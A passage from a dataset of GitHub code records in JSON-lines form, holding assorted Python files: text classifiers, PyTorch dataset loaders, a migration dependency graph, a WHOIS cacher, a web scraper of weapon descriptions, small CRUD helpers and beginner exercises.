\t\tc = \"Eventos\"\n \tif codigo == \"4\":\n \t\tc = \"Criminalidad\"\n \tif codigo == \"5\":\n \t\tc = \"Nada\" \t\t\n \tif codigo == \"6\":\n \t\tc = \"Tráfico\"\n \tif codigo == \"7\":\n \t\tc = \"Transporte público\"\n \tif codigo == \"8\":\n \t\tc = \"Terrorismo\"\n \treturn c\n\n def clasificadorNoticias(self, noticia):\n parameters = {'key': keyNoticias, 'model': modelNews, 'txt': noticia}\n r = requests.request('POST', api, data=parameters)\n response = r.content\n response_json = json.loads(response.decode('utf-8'))\n if(response_json['category_list']):\n cat = self.parseoCategoria(response_json['category_list'][0]['code'])\n else:\n cat = \"Nada\"\n return cat\n \n def clasificarTweets(self, tweet):\n parameters = {'key': keyTwitter, 'model': modelTwitter, 'txt': tweet}\n r = requests.request('POST', api, data=parameters)\n response = r.content\n response_json = json.loads(response.decode('utf-8'))\n if(response_json['category_list']):\n cat = self.parseoCategoria(response_json['category_list'][0]['code'])\n else:\n cat = \"Nada\"\n print(cat) \n print(\"\\n\")\n return cat\n \n\n def clasificadorZona(self, tweet):\n module_id = 'cl_iYYd3Hj2'\n res = mlZona.classifiers.classify(module_id, tweet, sandbox=True)\n resultado = res.result\n zona = resultado[0][0][\"label\"]\n print(zona)\n return zona\n\n\n\n \n","repo_name":"MadAlert/TFG","sub_path":"Python/Clasificador/Clasificador.py","file_name":"Clasificador.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45022970288","text":"import os\n\nimport networkx as nx\n\nhere, _ = os.path.split(__file__)\nhome = os.path.join(here, os.pardir)\nscript_path = os.path.join(home, 'data', 'sql_updates')\n\ndef get_graph():\n \"\"\"Build a `DiGraph` that captures dependencies between database migration\n tasks. Each node represents a migration script, and each edge represents\n a dependency between tasks. Tasks can be ordered using topological sort.\n \"\"\"\n graph = nx.DiGraph()\n for path in os.listdir(script_path):\n name, ext = os.path.splitext(path)\n if ext == '.sql':\n graph.add_node(name)\n\n graph.add_edge('candidate_history', 'candidate_detail')\n graph.add_edge('candidate_detail', 'candidate_election')\n\n graph.add_edges_from([\n ('candidate_history', 'candidate_history_latest'),\n ('candidate_election', 'candidate_history_latest')\n ])\n\n graph.add_edge('committee_history', 'committee_detail')\n\n graph.add_edges_from([\n ('candidate_history', 'filings'),\n ('committee_history', 'filings'),\n ])\n\n graph.add_edges_from([\n ('filing_amendments_presidential', 'filings'),\n ('filing_amendments_house_senate', 'filings'),\n ('filing_amendments_pac_party','filings'),\n ('filing_amendments_all', 'filings'),\n ])\n\n graph.add_edges_from([\n ('candidate_history', 'candidate_flags'),\n ('candidate_aggregates', 'candidate_flags'),\n ])\n\n graph.add_edges_from([\n ('filing_amendments_presidential', 'reports_presidential'),\n ('filing_amendments_house_senate', 'reports_house_senate'),\n ('filing_amendments_pac_party', 'reports_pac_party'),\n ('filing_amendments_all', 'reports_presidential'),\n ('filing_amendments_all', 'reports_house_senate'),\n ('filing_amendments_all', 'reports_pac_party'),\n ])\n graph.add_edges_from([\n ('totals_house_senate', 'totals_combined'),\n ('totals_presidential', 'totals_combined'),\n ('totals_pac_party', 'totals_combined'),\n ])\n\n graph.add_edges_from([\n ('committee_detail', 'committee_fulltext'),\n ('totals_combined', 'committee_fulltext'),\n ])\n\n graph.add_edge('committee_detail', 'totals_party')\n graph.add_edge('committee_detail', 'totals_pac')\n\n graph.add_edges_from([\n ('candidate_detail', 'candidate_fulltext'),\n ('totals_combined', 'candidate_fulltext'),\n ])\n\n graph.add_edge('totals_combined', 'sched_a_by_size_merged')\n\n graph.add_edges_from([\n ('totals_house_senate', 'candidate_aggregates'),\n ('totals_presidential', 'candidate_aggregates'),\n ('candidate_election', 'candidate_aggregates'),\n ('cand_cmte_linkage', 'candidate_aggregates'),\n ])\n\n graph.add_edges_from([\n ('committee_detail', 'large_aggregates'),\n ('reports_ie', 'large_aggregates'),\n ('communication_cost', 'large_aggregates'),\n ])\n\n graph.add_edge('committee_history', 'communication_cost')\n graph.add_edge('committee_detail', 'sched_a_by_state_recipient_totals')\n\n return graph\n","repo_name":"ArtyEmsee/openFEC","sub_path":"webservices/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"31397662985","text":"import os\nimport sys\nimport pickle\nfrom PIL import Image\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\n\nfrom .datasets import register\nimport numpy as np\n\n@register('mini-imagenet')\nclass MiniImageNet(Dataset):\n\n def __init__(self, root_path, split='train', **kwargs):\n self.split_tag = split\n if split not in ['train', 'val', 'test']:\n raise NotImplementedError\n print(\"Okay, \", self.split_tag)\n\n\n data_path = os.getcwd() + \"/materials/mini-imagenet/\" + split\n\n print(\"Data path: \", data_path)\n print(\"Contents: \", os.listdir(data_path))\n data = []\n label = []\n for count, class_id in enumerate(os.listdir(data_path)):\n class_label = count\n class_path = os.path.join(data_path, class_id)\n for class_image in os.listdir(class_path):\n clas_image_path = os.path.join(class_path, class_image)\n class_image_label = class_label\n data.append(clas_image_path)\n label.append(class_image_label)\n print(\"Class: \", class_label, class_id, \" Done\")\n # print(\"Class Image label: \", class_image_content.shape)\n # print(\"class content: \", os.listdir(class_path))\n # sys.exit()\n\n\n\n\n # Need to customize from here\n\n # split_file = 'miniImageNet_category_split_{}.pickle'.format(split_tag)\n # with open(os.path.join(root_path, split_file), 'rb') as f:\n # pack = pickle.load(f, encoding='latin1')\n # data = pack['data']\n # label = pack['labels']\n\n image_size = 80\n\n min_label = min(label)\n label = [x - min_label for x in label]\n\n self.data = data\n self.label = label\n self.n_classes = max(self.label) + 1\n\n norm_params = {'mean': [0.485, 0.456, 0.406],\n 'std': [0.229, 0.224, 0.225]}\n normalize = transforms.Normalize(**norm_params)\n\n self.transform = transforms.Compose([\n transforms.RandomResizedCrop(image_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n #No more need of augment resize\n print(f\"{split} data prep done!\")\n\n def convert_raw(x):\n mean = torch.tensor(norm_params['mean']).view(3, 1, 1).type_as(x)\n std = torch.tensor(norm_params['std']).view(3, 1, 1).type_as(x)\n return x * std + mean\n\n self.convert_raw = convert_raw\n\n def __len__(self):\n return len(self.data)\n\n def get_data(self, i):\n image_path = self.data[i]\n image = np.array(Image.open(image_path))\n return Image.fromarray(image)\n\n def __getitem__(self, i):\n the_data = self.get_data(i)\n # print(\"self.transform(self.data[i]): \", self.transform(the_data).shape)\n return self.transform(the_data), self.label[i]\n\n\nclass MiniImageNet_old_for_reference(Dataset):\n\n def __init__(self, root_path, split='train', **kwargs):\n split_tag = split\n if split == 'train':\n split_tag = 'train_phase_train'\n split_file = 'miniImageNet_category_split_{}.pickle'.format(split_tag)\n with open(os.path.join(root_path, split_file), 'rb') as f:\n pack = pickle.load(f, encoding='latin1')\n data = pack['data']\n label = pack['labels']\n\n image_size = 80\n data = [Image.fromarray(x) for x in data]\n\n min_label = min(label)\n label = [x - min_label for x in label]\n\n self.data = data\n self.label = label\n self.n_classes = max(self.label) + 1\n\n norm_params = {'mean': [0.485, 0.456, 0.406],\n 'std': [0.229, 0.224, 0.225]}\n normalize = transforms.Normalize(**norm_params)\n self.default_transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.ToTensor(),\n normalize,\n ])\n augment = kwargs.get('augment')\n if augment == 'resize':\n self.transform = transforms.Compose([\n transforms.RandomResizedCrop(image_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n elif augment == 'crop':\n self.transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.RandomCrop(image_size, padding=8),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n elif augment is None:\n self.transform = self.default_transform\n\n def convert_raw(x):\n mean = torch.tensor(norm_params['mean']).view(3, 1, 1).type_as(x)\n std = torch.tensor(norm_params['std']).view(3, 1, 1).type_as(x)\n return x * std + mean\n\n self.convert_raw = convert_raw\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, i):\n return self.transform(self.data[i]), self.label[i]\n","repo_name":"pandeydeep9/EvidentialResearch2023","sub_path":"FewShotExperiments/datasets/mini_imagenet.py","file_name":"mini_imagenet.py","file_ext":"py","file_size_in_byte":5126,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"23774805641","text":"'''\n Add Strings\n\nGiven two non-negative integers, num1 and num2 represented as string, return the sum of num1 and num2 as a string.\n\nYou must solve the problem without using any built-in library for handling large integers (such as BigInteger). You must also not convert the inputs to integers directly.\n\n \n\nExample 1:\n\nInput: num1 = \"11\", num2 = \"123\"\nOutput: \"134\"\n\nExample 2:\n\nInput: num1 = \"456\", num2 = \"77\"\nOutput: \"533\"\n\nExample 3:\n\nInput: num1 = \"0\", num2 = \"0\"\nOutput: \"0\"\n\n \n\nConstraints:\n\n 1 <= num1.length, num2.length <= 104\n num1 and num2 consist of only digits.\n num1 and num2 don't have any leading zeros except for the zero itself.\n\n'''\n\nclass Solution:\n def addStrings(self, num1: str, num2: str) -> str:\n c = 0\n ans = []\n num1_index = len(num1) - 1\n num2_index = len(num2) - 1\n while num1_index >= 0 and num2_index >= 0:\n s = int(num1[num1_index]) + int(num2[num2_index]) + c\n c = s//10\n ans.append(s%10)\n num1_index -= 1\n num2_index -= 1\n if num1_index > num2_index:\n while num1_index >= 0:\n s = int(num1[num1_index]) + c\n c = s//10\n ans.append(s%10)\n num1_index -= 1\n else:\n while num2_index >= 0:\n s = int(num2[num2_index]) + c\n c = s//10\n ans.append(s%10)\n num2_index -= 1\n if c:\n ans.append(c)\n return \"\".join(str(val) for val in ans[::-1])\n\nnum1 = \"11\"\nnum2 = \"123\"\n# Output: \"134\"\n\nnum1 = \"456\"\nnum2 = \"77\"\n# Output: \"533\"\n\nnum1 = \"0\"\nnum2 = \"0\"\n# Output: \"0\"\n\nsol = Solution()\nprint(sol.addStrings(num1, num2))\n","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2021/8.August 2021/9.addStrings.py","file_name":"9.addStrings.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9550596831","text":"# http://cryto.net/pythonwhois/usage.html\nfrom datetime import datetime\nfrom pytz import utc\nfrom .models import Domain\nfrom .models import Whois\nfrom django.core import serializers\nfrom pythonwhois import get_whois\nfrom pythonwhois.shared import WhoisException\n\nclass WhoisCachier:\n\n def update_whois_model(domain_model):\n try:\n whois = get_whois(domain_model.domain_name, normalized=True)\n except Exception as err:\n print(\"upate_whois() failed: {0}\".format(err))\n return\n datadict = {}\n for k,v in whois.items():\n if not hasattr(Whois, k):\n continue # skip whois fields not in our model\n if k == 'id':\n continue # conflicts with Model field; also is irrelevant data\n if isinstance(v, list):\n if len(v) > 1:\n datadict[k] = ','.join(v)\n else:\n if isinstance(v[0], datetime):\n datadict[k] = v[0].replace(tzinfo=utc)\n else:\n datadict[k] = v[0]\n elif isinstance(v, dict):\n datadict[k] = v\n else:\n datadict[k] = v\n datadict['internal_cache_date'] = datetime.now().replace(tzinfo=utc)\n whois_record, created = Whois.objects.update_or_create(\n domain=domain_model,\n defaults = datadict\n )\n domain_model.whois = whois_record\n domain_model.save()\n","repo_name":"VEuPathDB/docker-hq","sub_path":"hq/domains/whois.py","file_name":"whois.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1553568455","text":"from models.models import ProblemTypes\n\ndef getAllProblemTypes():\n try:\n problem = ProblemTypes.query.all()\n response = [{'id': i.id, 'description': i.description} for i in problem]\n except:\n reponse = {'message': 'don not exist any status to occurrence'}\n return response\n\ndef getSpecificProblemTypes(id):\n try:\n problem = ProblemTypes.query.filter_by(id=id).first()\n response = {'description': problem.description}\n except:\n response = {'message', 'could not find the status'}\n return response\n\ndef deleteProblemTypes(id):\n try:\n problem = ProblemTypes.query.filter_by(id=id).first()\n problem.delete()\n response = {'message': 'deleted with success'}\n except:\n response = {'message': 'could not find the status'}\n return response\n\ndef constructProblemTypes(data):\n try:\n new_data = ProblemTypes(\n description = data['description']\n )\n new_data.save()\n response = {'message': 'save with success'}\n except:\n response = {'message': 'could not save the status'}\n return response\n","repo_name":"PedroSMarcal/Hackaton2021","sub_path":"backend/utils/ProblemTypeUtil.py","file_name":"ProblemTypeUtil.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13495748046","text":"# Cidades\n# 1º Exemplo\nprompt = \"\\nPlease enter the name of a city you have visited: \"\nprompt += \"\\n(Enter 'quit' when you are finished.) \"\nwhile True:\n cidade = str(input(prompt))\n if cidade == 'quit':\n break\n else:\n print(f\"I'd love to go to {cidade.title()}!\")\n\n# 2º Exemplo\nwhile True:\n cidade = str(input('Please enter the name of a city you have visited: ')) # noqa\n if cidade == 'quit':\n break\n else:\n print(f\"I'd love to go to {cidade.title()}!\\n\")\n print(\"Enter 'quit' when you are finished.\")\n","repo_name":"JenaCarry/Curso-Intesensivo-Python","sub_path":"capitulo_7/cidades.py","file_name":"cidades.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9848503569","text":"import os\nimport random\nimport json\nimport torch\nimport torch.nn as nn\n\nfrom collections import namedtuple\n\n# Can be simply regarded as a object, called \"Batch\", having attributes \"input\" and \"target\"\nBatch = namedtuple('Batch', 'input target')\n\nclass Dataset(): \n\n def __init__(self, raw_train_file, train_file, dev_file, test_file, word_to_idx, use_gpu=False):\n # word_to_idx/tag_to_idx: both are functions, whose input is a string and output an int\n self.num_classes = 10\n self.use_gpu = use_gpu\n\n self.train_file = train_file\n self.dev_file = dev_file\n self.test_file = test_file\n\n # Shuffle trainset\n self.shuffle_trainset(raw_train_file, train_file)\n\n self.word_to_idx = word_to_idx\n\n self.num_train_samples = 0\n for batch in self.trainset(batch_size=1000):\n self.num_train_samples += batch[0].shape[0]\n\n self.num_dev_samples = 0\n for batch in self.devset(batch_size=1000):\n self.num_dev_samples += batch[0].shape[0]\n\n self.num_test_samples = 0\n for batch in self.testset(batch_size=1000):\n self.num_test_samples += batch[0].shape[0]\n\n def shuffle_trainset(self, raw_file, out_file):\n\n if os.path.exists(out_file):\n print ('Trainset has been shuffled, do not shuffle.')\n return \n\n lines = []\n with open(raw_file, 'r') as f:\n lines = f.readlines()\n random.shuffle(lines)\n with open(out_file, 'w') as f:\n for line in lines:\n f.write(line)\n \n\n def trainset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.train_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n \n def devset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.dev_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n\n def testset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.test_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n\n def tag_to_idx(self, t):\n t2i = {'体育': 0, '财经': 1, '房产': 2, '家居': 3, '教育': 4, '科技': 5, '时尚': 6, '时政': 7, '游戏': 8, '娱乐': 9}\n return t2i[t]\n\n def sentence_to_tensor(self, s):\n # s: string or list\n # return: 1-d long tensor of shape (seq_len)\n return torch.LongTensor([self.word_to_idx(w) for w in s])\n\n def pad_sequence(self, s):\n # TODO pad to 512?\n return nn.utils.rnn.pad_sequence(s, batch_first=True)\n\n # TODO preprocess string\n def samples(self, file_path):\n\n with open(file_path, 'r') as f:\n for line in f:\n tag, sent = line.strip().split('\\t')\n # print (tag, sent)\n # input ()\n\n sent = self.sentence_to_tensor(sent)\n tag = torch.LongTensor([self.tag_to_idx(tag)])\n\n if self.use_gpu: \n yield sent.cuda(), tag.cuda()\n else: \n yield sent, tag\n \n \n def sample_batches(self, file_path, batch_size=1, drop_last=False):\n # drop_last: drop the last incomplete batch if True\n cnt = 0\n\n # Input and target\n sent_batch, tag_batch = [], [] # (batch_size, seq_len), (batch_size)\n\n for sent, tag in self.samples(file_path):\n # all tensor-like\n\n sent_batch.append(sent)\n tag_batch.append(tag)\n\n cnt += 1\n if cnt >= batch_size:\n\n yield Batch(input=self.pad_sequence(sent_batch), target=torch.cat(tag_batch))\n sent_batch, tag_batch = [], []\n cnt = 0\n\n if cnt > 0 and not drop_last:\n yield Batch(input=self.pad_sequence(sent_batch), target=torch.cat(tag_batch))\n\n\n\n\nif __name__ == '__main__': \n # Usage\n raw_train_file = 'cnews/cnews.train.txt'\n train_file = 'cnews/cnews.train.shuffled.txt'\n dev_file = 'cnews/cnews.val.txt'\n test_file = 'cnews/cnews.test.txt'\n\n def word_to_idx(w):\n w2i = {'当': 1, '希': 2}\n return w2i.get(w, 0)\n\n dataset = Dataset(raw_train_file=raw_train_file, train_file=train_file, dev_file=dev_file, test_file=test_file, word_to_idx=word_to_idx)\n\n print (f'trainset: {dataset.num_train_samples}')\n print (f'devset: {dataset.num_dev_samples}')\n print (f'testset: {dataset.num_test_samples}')\n\n cnt = 0\n for sent_batch, tag_batch in dataset.trainset(batch_size=10, drop_last=False):\n # print (f'sent_batch: {sent_batch.shape}, tag_batch: {tag_batch.shape}')\n # input ()\n cnt += sent_batch.shape[0]\n print (f'trainset: {cnt}')\n \n cnt = 0\n for sent_batch, tag_batch in dataset.devset(batch_size=10, drop_last=False):\n # print (f'sent_batch: {sent_batch.shape}, tag_batch: {tag_batch.shape}')\n # input ()\n cnt += sent_batch.shape[0]\n print (f'devset: {cnt}')\n\n cnt = 0\n for sent_batch, tag_batch in dataset.testset(batch_size=10, drop_last=False):\n # print (f'sent_batch: {sent_batch.shape}, tag_batch: {tag_batch.shape}')\n # input ()\n cnt += sent_batch.shape[0]\n print (f'testset: {cnt}')\n\n","repo_name":"Hongqin-Li/NTFS","sub_path":"data/thucnews/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30792405010","text":"import os\nimport socket\nimport string\nimport threading\nimport time\nimport urllib.request\nimport urllib.error\nimport requests\nimport xlrd\nfrom bs4 import BeautifulSoup\nimport pymongo\nfrom common_function import clear_char\n\nTAG_URL_OF_WEAPON = 'url_of_weapon'\nTAG_URL_OF_CACHE = 'url_of_cache'\nBASE_URL = 'http://weapon.huanqiu.com'\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = client[\"huanqiu\"]\n\n\n# db.create_collection('key_url')\n\n\n# col = db[\"key_url\"]\ndef request_url(url):\n data = requests.get(url)\n # col = db[\"cache_url\"]\n # source = col.find_one({'url': url})\n # if source:\n # return source['source']\n # else:\n # print(url)\n # col.insert_one({\n # 'tag': TAG_URL_OF_CACHE,\n # 'url': url,\n # 'source': data.text\n # })\n return data.text\n\n\n# def insert_urlofweapon():\n# col = db[\"key_url\"]\n# col.insert_one({\n# 'tag': TAG_URL_OF_WEAPON,\n# 'url': url\n# 'name': name\n# })\n\n\ndef get_weapon_url(source, keyname):\n # col = db[\"key_url\"]\n soup = BeautifulSoup(source, 'html.parser')\n li = soup.find('li', class_=\"img\")\n url = li.find('a').get('href')\n url = BASE_URL + url\n # if col.find_one({'name': keyname}):\n # col.replace_one(\n # {'name': keyname},\n # {\n # 'tag': TAG_URL_OF_WEAPON,\n # 'url': url,\n # 'name': keyname\n # })\n # else:\n # col.insert_one({\n # 'tag': TAG_URL_OF_WEAPON,\n # 'url': url,\n # 'name': keyname\n # })\n\n\ndef get_weapon_info(keyname,source):\n # data_info=''\n #\n # col = db[\"key_url\"]\n # result = col.find_one({'name': keyname})\n # if col.find_one({'name': keyname}):\n\n soup = BeautifulSoup(source, 'html.parser')\n li = soup.find('li', class_=\"img\")\n url = li.find('a').get('href')\n url = BASE_URL + url\n \n # url = result['url']\n source = request_url(url)\n soup = BeautifulSoup(source, 'html.parser')\n data_info = soup.find('div', class_='dataInfo')\n data_info = data_info.text\n try:\n intron = soup.find('div', class_='intron')\n intron = intron.text\n info = soup.find('div', class_='info')\n info = info.text\n except Exception as e:\n info = ''\n intron = ''\n print(e)\n with open('dirlist', 'r', encoding='utf8') as f_r:\n dirs_lines = f_r.readlines()\n for l in dirs_lines:\n if keyname in l:\n dirname = '../' + l.strip('\\n')\n with open(dirname + '/info.txt', 'a',encoding='utf8') as f:\n f.write(data_info)\n f.write(info)\n f.write(intron)\n try:\n img = soup.find('div', class_=\"maxPic\")\n img = img.find('img').get('src')\n res = requests.get(img)\n res.raw.decode_content = True\n print(img)\n\n if res.status_code == 200:\n # str(random.randint(0, 9999))\n with open(dirname + os.sep + '0001' + '.jpg', 'wb') as image_f:\n image_f.write(res.content)\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n xls_file = '../../cfg/list.xlsx'\n wb = xlrd.open_workbook(xls_file)\n sheet = wb.sheet_by_index(0)\n for irow in range(5212,sheet.nrows):\n print(irow)\n c_row = sheet.row(irow)\n # A = c_row[0].value\n # B = c_row[1].value\n # C = c_row[2].value\n D = c_row[3].value\n # A = clear_char(A)\n # B = clear_char(B)\n # C = clear_char(C)\n D = clear_char(D)\n print(D)\n # keyname = 'C-295中程预警机'\n keyname = D\n search_url = 'http://weapon.huanqiu.com/search?keyword='\n url = 'http://weapon.huanqiu.com/search?keyword=' + keyname\n keyname = clear_char(keyname)\n\n # data=request_url(url)\n # query = {\"tag\":TAG_URL_OF_WEAPON}\n # col.delete_many(query)\n try:\n source = request_url(url)\n # print(source)\n # get_weapon_url(source, keyname)\n get_weapon_info(keyname,source)\n # print(request_url('http://weapon.huanqiu.com/c_295'))\n except:\n continue\n","repo_name":"superxiaotutu/worm","sub_path":"python_worm/huanqiu/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19835435225","text":"import cv2\r\nimport torch\r\nimport numpy as np\r\nfrom matplotlib import cm\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\n\r\nclass MnistModel(nn.Module):\r\n \"\"\"Feedfoward neural network with 1 hidden layer\"\"\"\r\n def __init__(self, in_size, hidden_size, out_size):\r\n super().__init__()\r\n # hidden layer\r\n self.linear1 = nn.Linear(in_size, hidden_size)\r\n # output layer\r\n self.linear2 = nn.Linear(hidden_size, out_size)\r\n \r\n def forward(self, xb):\r\n # Flatten the image tensors\r\n xb = xb.view(xb.size(0), -1)\r\n # Get intermediate outputs using hidden layer\r\n out = self.linear1(xb)\r\n # Apply activation function\r\n out = F.relu(out)\r\n # Get predictions using output layer\r\n out = self.linear2(out)\r\n return out\r\n \r\n def training_step(self, batch):\r\n images, labels = batch \r\n out = self(images) # Generate predictions\r\n loss = F.cross_entropy(out, labels) # Calculate loss\r\n return loss\r\n \r\n def validation_step(self, batch):\r\n images, labels = batch \r\n out = self(images) # Generate predictions\r\n loss = F.cross_entropy(out, labels) # Calculate loss\r\n acc = accuracy(out, labels) # Calculate accuracy\r\n return {'val_loss': loss, 'val_acc': acc}\r\n \r\n def validation_epoch_end(self, outputs):\r\n batch_losses = [x['val_loss'] for x in outputs]\r\n epoch_loss = torch.stack(batch_losses).mean() # Combine losses\r\n batch_accs = [x['val_acc'] for x in outputs]\r\n epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies\r\n return {'val_loss': epoch_loss.item(), 'val_acc': epoch_acc.item()}\r\n \r\n def epoch_end(self, epoch, result):\r\n print(\"Epoch [{}], val_loss: {:.4f}, val_acc: {:.4f}\".format(epoch, result['val_loss'], result['val_acc']))\r\n\r\ndef accuracy(outputs, labels):\r\n _, preds = torch.max(outputs, dim=1)\r\n return torch.tensor(torch.sum(preds == labels).item() / len(preds))\r\n\r\ninput_size = 784\r\nhidden_size = 32 # you can change this\r\nnum_classes = 10\r\n\r\nmodel = MnistModel(input_size, hidden_size=32, out_size=num_classes)\r\nmodel.load_state_dict(torch.load('digit/digit.pth'))\r\nmodel.eval()\r\n\r\ndef predict_image(img, model):\r\n xb = img.unsqueeze(0)\r\n yb = model(xb)\r\n _, preds = torch.max(yb, dim=1)\r\n return preds[0].item()\r\n\r\nfrom PIL import Image\r\nimport torchvision.transforms as transforms\r\n\r\nimage = cv2.imread('digit/images/test3.png')\r\n\r\ntransform = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Resize((28, 28))])\r\n \r\nimg_tensor = transform(image)\r\nimg_tensor = img_tensor[0:1, :, :]\r\nprint(img_tensor.shape)\r\nprint('Predicted:', predict_image(img_tensor, model))","repo_name":"Infi-09/Doctor-Prescripton-Handwritten-Recoginition","sub_path":"digit/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"71898236712","text":"import random\r\nprint('===== DESAFIO 19 =====')\r\n# Um professor quer sortear um dos seus quatro alunos para apagar o quadro.\r\n# Faça um programa que ajude ele, lendo o nome deles e escrevendo o nome do escolhido.\r\nalunos = input('\\nDigite o nome dos 4 alunos separados por um espaço: ')\r\nalunos_list = alunos.split()\r\n\r\nfor i in range(4):\r\n alunos_list[i] = str(alunos_list[i])\r\n\r\n# print('\\nAlunos incluídos na lista: {}'.format(alunos_list))\r\nprint('Aluno selecionado: {}'.format(random.choice(alunos_list)))\r\n","repo_name":"carolasouza/Curso-em-Video---Python","sub_path":"Mundo 01/exercicios/ex019a.py","file_name":"ex019a.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1377429952","text":"import importlib.util\nfrom PySide2.QtWidgets import (\n QWidget, QDialog, QDialogButtonBox, QLabel, QLineEdit, QHBoxLayout, QVBoxLayout, QFrame\n)\nimport symba_gui as package\nfrom .editor import Editor\n\n\nclass ChartEditor(QDialog):\n def __init__(self, parent=None, title=None, code=None):\n super().__init__(parent=parent)\n self.setWindowTitle(\"Chart Editor\")\n\n self.wtitle = QLineEdit(title or \"Untitled Chart\")\n self.wcode = Editor()\n self.wcode.setLanguage(\"python\")\n\n if code is None:\n with open(package.dir / \"data/default_chart.py\", \"r\", encoding=\"utf-8\") as f:\n code = f.read()\n \n self.wcode.setText(code)\n\n wcode_frame = QFrame()\n wcode_frame.setFrameShape(wcode_frame.Box)\n wcode_frame.setFrameShadow(wcode_frame.Sunken)\n lycode_frame = QHBoxLayout()\n lycode_frame.setContentsMargins(0, 0, 0, 0)\n wcode_frame.setLayout(lycode_frame)\n lycode_frame.addWidget(self.wcode)\n\n lytitle_container = QHBoxLayout()\n lytitle_container.setContentsMargins(0, 0, 0, 0)\n\n lytitle_container.addWidget(QLabel(\"Chart title:\"))\n lytitle_container.addWidget(self.wtitle)\n\n button_box = QDialogButtonBox(QDialogButtonBox.Save | QDialogButtonBox.Cancel)\n self.wbutton_save = button_box.button(QDialogButtonBox.Save)\n self.wbutton_cancel = button_box.button(QDialogButtonBox.Cancel)\n\n self.wbutton_save.clicked.connect(self.accept)\n self.wbutton_cancel.clicked.connect(self.reject)\n\n line = QFrame()\n line.setFrameShape(QFrame.HLine)\n line.setFrameShadow(QFrame.Sunken)\n\n ly = QVBoxLayout()\n self.setLayout(ly)\n\n ly.addLayout(lytitle_container)\n ly.addWidget(wcode_frame)\n ly.addWidget(line)\n ly.addWidget(button_box)\n \n @property\n def title(self):\n return self.wtitle.text()\n \n @title.setter\n def title(self, text):\n self.wtitle.setText(text)\n \n @property\n def code(self):\n return self.wcode.text()\n \n @code.setter\n def code(self, text):\n self.wcode.setText(text)\n\n\nclass Chart(QWidget):\n \"\"\"A user-made chart that loads from a python file.\"\"\"\n def __init__(self, output_dir, path):\n super().__init__()\n self.output_dir = output_dir\n self.path = path\n self.title = path.stem\n self.wchart = QWidget() # Initialized later in reload()\n\n ly = QVBoxLayout()\n self.setLayout(ly)\n ly.addWidget(self.wchart)\n\n self._editor = None\n\n self.reload()\n\n def reload(self, path=None):\n self.path = path or self.path\n \n self.layout().removeWidget(self.wchart)\n\n # Import the module and call chart() function\n spec = importlib.util.spec_from_file_location(self.title, self.path)\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n self.wchart = module.chart(str(self.output_dir))\n\n self.layout().addWidget(self.wchart)\n\n def editor(self):\n \"\"\"Return an editor that is linked to this chart.\"\"\"\n with open(self.path, \"r\", encoding=\"utf-8\") as f:\n code = f.read()\n \n if self._editor is None:\n self._editor = ChartEditor(self)\n\n def done(result):\n if not result:\n return # User cancelled\n\n title = self._editor.title\n code = self._editor.code\n\n self.path.unlink()\n self.path = self.path.parent / (title + \".py\")\n\n with open(self.path, \"w\", encoding=\"utf-8\") as f:\n f.write(code)\n\n self.reload()\n \n self._editor.finished.connect(done)\n \n self._editor.title = self.title\n self._editor.code = code\n \n return self._editor\n","repo_name":"johannlussange/symba-gui","sub_path":"symba_gui/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15160196219","text":"def main():\r\n n, k = map(int, input().split())\r\n tt = [int(input()) for _ in range(n)]\r\n for i in range(2, n):\r\n if tt[i] + tt[i - 1] + tt[i - 2] < k:\r\n print(i + 1)\r\n return\r\n print(-1)\r\n\r\n\r\nif __name__ == 